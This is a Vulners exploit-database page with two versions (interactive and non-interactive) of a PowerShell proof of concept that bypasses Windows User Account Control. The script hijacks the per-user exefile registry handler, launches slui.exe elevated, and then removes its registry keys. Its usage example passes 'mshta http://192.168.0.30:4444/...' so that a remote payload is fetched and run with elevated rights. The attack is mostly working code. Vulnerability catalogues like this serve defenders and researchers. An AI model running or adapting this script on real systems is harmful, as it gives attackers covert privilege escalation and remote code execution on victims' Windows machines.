Vulners
Lucene search
Microsoft Windows - UAC Protection Bypass (Via Slui File Handler Hijack) (PowerShell)
Interactive Version:
<#
.SYNOPSIS
This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE
.NOTES
Function : SluiHijackBypass
File Name : SluiHijackBypass.ps1
Author : Gushmazuko
.LINK
https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass.ps1
Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
.EXAMPLE
Load "cmd.exe" (By Default used 'arch 64'):
SluiHijackBypass -command "cmd.exe" -arch 64
Load "mshta http://192.168.0.30:4444/0HUGN"
SluiHijackBypass -command "mshta http://192.168.0.30:4444/0HUGN"
#>
function SluiHijackBypass(){
Param (
[Parameter(Mandatory=$True)]
[String]$command,
[ValidateSet(64,86)]
[int]$arch = 64
)
#Create registry structure
New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $command -Force
#Perform the bypass
switch($arch)
{
64
{
#x64 shell in Windows x64 | x86 shell in Windows x86
Start-Process "C:\Windows\System32\slui.exe" -Verb runas
}
86
{
#x86 shell in Windows x64
C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process C:\Windows\System32\slui.exe -Verb runas"
}
}
#Remove registry structure
Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -Force
}
################################################################################
Non-Interactive Version:
<#
.SYNOPSIS
Noninteractive version of script, for directly execute.
This script is a proof of concept to bypass the User Access Control (UAC) via SluiFileHandlerHijackLPE
.NOTES
File Name : SluiHijackBypass_direct.ps1
Author : Gushmazuko
.LINK
https://github.com/gushmazuko/WinBypass/blob/master/SluiHijackBypass_direct.ps1
Original source: https://bytecode77.com/hacking/exploits/uac-bypass/slui-file-handler-hijack-privilege-escalation
.EXAMPLE
Load "cmd.exe" (By Default used 'arch 64'):
powershell -exec bypass .\SluiHijackBypass_direct.ps1
#>
$program = "cmd.exe"
New-Item "HKCU:\Software\Classes\exefile\shell\open\command" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\exefile\shell\open\command" -Name "(default)" -Value $program -Force
#For x64 shell in Windows x64:
Start-Process "C:\Windows\System32\slui.exe" -Verb runas
#For x86 shell in Windows x64:
#C:\Windows\Sysnative\cmd.exe /c "powershell Start-Process "C:\Windows\System32\slui.exe" -Verb runas"
Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\exefile\shell\" -Recurse -ForceData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Jun 2019 00:00Current
7.4High risk
Vulners AI Score7.4